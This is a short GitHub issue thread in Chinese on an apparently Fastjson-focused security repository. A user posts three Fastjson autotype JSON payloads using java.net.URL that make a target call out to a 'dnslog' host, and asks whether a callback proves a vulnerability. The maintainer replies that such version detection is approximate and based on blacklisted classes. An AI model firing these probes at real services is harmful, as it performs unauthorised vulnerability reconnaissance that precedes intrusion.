### ISSUE TITLE
关于版本判断 请教一下

### ISSUE THREAD

**Issue by kingz40o** [safe6Sec/Fastjson#3]
fastjson >1.2.43
```java
{{"@type":"java.net.URL","val":"http://dnslog"}:"x"} 可以收到请求
```

fastjson >1.2.68

```java
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}可以收到请求
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}可以收到请求
```
如果通过以上请求可以获取dns以及http请求，1、是否代表了确实存在漏洞，2、但不代表能够实际利用呢

**Comment by safe6Sec** [comment]
> fastjson >1.2.43
> 
> ```java
> {{"@type":"java.net.URL","val":"http://dnslog"}:"x"} 可以收到请求
> ```
> 
> fastjson >1.2.68
> 
> ```java
> {{"@type":"java.net.URL","val":"dnslog"}:"aaa"}可以收到请求
> {"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}可以收到请求
> ```
> 
> 如果通过以上请求可以获取dns以及http请求，1、是否代表了确实存在漏洞，2、但不代表能够实际利用呢

版本判断不是百分百准确，我也只试过几个关键版本，能探测出大概的版本范围，只能当个参考。其原理主要就是利用各个类被加入黑名单的方式进行判断的。如不了解黑名单是什么，自行了解。
